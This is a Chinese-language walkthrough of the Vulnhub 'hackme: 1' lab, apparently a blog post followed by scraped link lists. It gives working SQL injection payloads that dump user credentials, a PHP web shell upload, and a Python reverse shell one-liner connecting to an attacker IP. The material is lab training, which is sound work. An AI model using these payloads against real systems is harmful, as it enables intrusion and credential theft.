一、靶机搭建

选择扫描虚拟机

选择路径即可

二、信息收集

靶机信息

Name: hackme: 1
Date release: 18 Jul 2019
难度:初级,目标是通过web漏洞获得有限的权限访问,随后权限以root身份升级。这个实验室是为了模拟现实生活环境而创建的。
“hackme”使用DHCP,在mysqld可能自行关闭的情况下(非常罕见的情况),尝试强制重启机器,随后它应该可以正常工作。
hint:本节介绍已收集到的有关该版本的各种信息,例如网页和/或自述文件中的引文。

扫ip

靶机ip:192.168.108.150

扫开放端口和服务

开放了22和80端口

信息如下:

22/tcp open  ssh     OpenSSH 7.7p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.34 ((Ubuntu))

指纹探测

使用以下命令

nmap 192.168.108.150 -p 22,80 -sV -sC -O --version-all

信息如下:

运行系统: Linux 3.X|4.X
操作系统CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS 详情: Linux 3.2 - 4.9
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

目录扫描

先看看dirb扫描

试试dirsearch扫描

信息如下:

http://192.168.108.150/uploads        #文件上传
http://192.168.108.150/config.php #配置信息
http://192.168.108.150/login.php #登录界面
http://192.168.108.150/logout.php #登出界面
http://192.168.108.150/register.php #注册界面

三、Web渗透

信息收集

主页面

由于其他页面无法正常访问,只有一个uploads,也没有什么可以利用的信息

回去注册一个账户并登录

是一个查询界面,查询书名

点击search先看看,看来有数据库,可能是sql注入

抓包看一下,存在注入点

sql注入

判断类型

无回显,看来需要注释符

字符型注入

由于之前search查询出来的结果,该数据库存在三个字段

爆数据库名和版本号

-1' union select version(),database(),3#
数据库:webapphacking

爆表名

-1' union select group_concat(table_name),2,3 from information_schema.tables where table_schema="webapphacking"#
数据表名称:books,users
  • group_concat():将多行的结果合并到一行
  • information_schema.tables:是一个系统数据库,它存储了所有数据库、表、列等的元数据。在这里,攻击者查询的是tables表,目的是获取所有表的名字。
  • table_schema:指定数据库名称

爆users表下的列

获取users表的列名

-1' union select group_concat(column_name),2,3 from information_schema.columns where table_name="users"#
id,user,pasword,name,address

group_concat():将多行的结果合并到一行

select group_concat(column_name),2,3:将结果输出全部在第一字段里,2和3是为了填充查询列,避免出错

获取users表下的用户和密码

-1' union select group_concat(user),group_concat(pasword),3 from users#

这里有很多用户以及他们密码的md5值,我们看比较重要的,superadmin2386acb2cf356944177746fc92523983

查询一下,密码:Uncrackable

文件上传

重新登录

如下,有一个文件上传点,结合之前扫描出来的文件上传页面进行文件上传

访问uploads界面,可以正常上传,且可以访问

上传一个php文件,名为nc.php

track
<?php system($_GET["a"]); ?>

上传成功

执行一下系统命令试试,成功执行

文件上传反弹shell

kali开启监听

利用python反弹shell

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.108.130",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

反弹成功

四、提权

进入环境先信息收集一波,不过目录是web服务下的,没什么可用信息

进入/home 目录查看,发现两个可疑文件夹,hackme和legacy,访问hackme看看

存在两个可疑文件,但不知道怎么利用,进入另一个目录看看,发现一个脚本

  • s:设置用户ID位(setuid),表示当用户执行这个文件时,进程将以文件所有者的权限运行。

ok,直接把提权脚本给我们了,执行该脚本

提权成功

Vulnhub-Hackme的更多相关文章

  1. Hackme: 1: Vulnhub Walkthrough

    下载链接: https://www.vulnhub.com/entry/hackme-1,330/ 网络扫描探测: ╰─ nmap -p1-65535 -sV -A 10.10.202.131 22/ ...

  2. vulnhub writeup - 持续更新

    目录 wakanda: 1 0. Description 1. flag1.txt 2. flag2.txt 3. flag3.txt Finished Tips Basic Pentesting: ...

  3. Vulnhub Breach1.0

    1.靶机信息 下载链接 https://download.vulnhub.com/breach/Breach-1.0.zip 靶机说明 Breach1.0是一个难度为初级到中级的BooT2Root/C ...

  4. HA Joker Vulnhub Walkthrough

    下载地址: https://www.vulnhub.com/entry/ha-joker,379/ 主机扫描: ╰─ nmap -p- -sV -oA scan 10.10.202.132Starti ...

  5. HA: ISRO Vulnhub Walkthrough

    下载地址: https://www.vulnhub.com/entry/ha-isro,376/ 主机扫描: ╰─ nmap -p- -sV -oA scan 10.10.202.131Startin ...

  6. LAMPSecurity: CTF6 Vulnhub Walkthrough

    镜像下载地址: https://www.vulnhub.com/entry/lampsecurity-ctf6,85/ 主机扫描: ╰─ nmap -p- -sV -oA scan 10.10.202 ...

  7. Hacker Fest: 2019 Vulnhub Walkthrough

    靶机地址: https://www.vulnhub.com/entry/hacker-fest-2019,378/ 主机扫描: FTP尝试匿名登录 应该是WordPress的站点 进行目录扫描: py ...

  8. DC8: Vulnhub Walkthrough

    镜像下载链接: https://www.vulnhub.com/entry/dc-8,367/#download 主机扫描: http://10.10.202.131/?nid=2%27 http:/ ...

  9. HA: Infinity Stones Vulnhub Walkthrough

    下载地址: https://www.vulnhub.com/entry/ha-infinity-stones,366/ 主机扫描: 目录枚举 我们按照密码规则生成字典:gam,%%@@2012 cru ...

  10. Sunset: Nightfall Vulnhub Walkthrough

    靶机链接: https://www.vulnhub.com/entry/sunset-nightfall,355/ 主机扫描: ╰─ nmap -p- -A 10.10.202.162Starting ...

随机推荐

  1. Redis 的DB多个数据库使用

    Redis 自己安装默认提供了16个数据库. 每个数据库都有一个id, 从 0 开始,(0,15). 不同的数据库中数据隔离保存.我们可以通过修改redis的配置文件进行修改数据库的数量. /etc/ ...

  2. Qt音视频开发06-海康sdk内核linux客户端

    一.前言 海康sdk的示例在官方是提供了的,但是无论UI还是交互简直是宇宙无敌的垃圾,猜测应该是初学者编写的,估计练手用的,所以老早就想把这个linux支持集成到自己的示例中,既然已经支持了windo ...

  3. [转]Winform实现多线程异步更新UI(进度及状态信息)

    引言 在进行Winform程序开发需要进行大量的数据的读写操作的时候,往往会需要一定的时间,然在这个时间段里面,界面ui得不到更新,导致在用户看来界面处于假死的状态,造成了不好的用户体验.所以在大量数 ...

  4. 即时通讯技术文集(第29期):IM开发技术合集(Part2) [共18篇]

    为了更好地分类阅读 52im.net 总计1000多篇精编文章,我将在每周三推送新的一期技术文集,本次是第29 期. [- 1 -] 谈谈移动端 IM 开发中登录请求的优化 [链接] http://w ...

  5. 企业微信的IM架构设计揭秘:消息模型、万人群、已读回执、消息撤回等

    本文作者潘唐磊,腾讯WXG(微信事业群)开发工程师,毕业于中山大学.内容有修订. 1.内容概述 本文总结了企业微信的IM消息系统架构设计,阐述了企业业务给IM架构设计带来的技术难点和挑战,以及技术方案 ...

  6. 架构-初识BFF

    引言 晚上公司开了一个技术分享会,主要内容就是公司的项目架构,会中讲解了项目整体架构是BFF架构,就是在微服务之上多加了一层. 除此之外,还讲解了DDD设计思想,主要用于各个业务中台,如订单中台.用户 ...

  7. 关于前端url实现下载文件

    首先关于前端下载肯定会想到a链接,但是我在使用的时候发现a标签会打开这个网址而不是下载文件,所以我发现了一个好的方法,感觉不错,来分享一下 话不多说,上代码 // 下载文件 _downLoad(url ...

  8. CDS标准视图:技术对象检验级别描述 I_TechObjInspectionLevelText

    视图名称:技术对象检验级别描述 I_TechObjInspectionLevelText 视图类型:基础视图 视图代码: 点击查看代码 @AbapCatalog: { sqlViewName: 'IT ...

  9. datagrip中调用oracle存储过程

    declare mess varchar2(300); begin P_DETAIL_PROC(参数1,...,mess); DBMS_OUTPUT.PUT_LINE(mess); end; P_DE ...

  10. react给当前元素添加一个类以及key的作用

    给当前元素添加一个类是通过className来处理的: 引入css;直接from XXXX import React, { Component } from "react"; // ...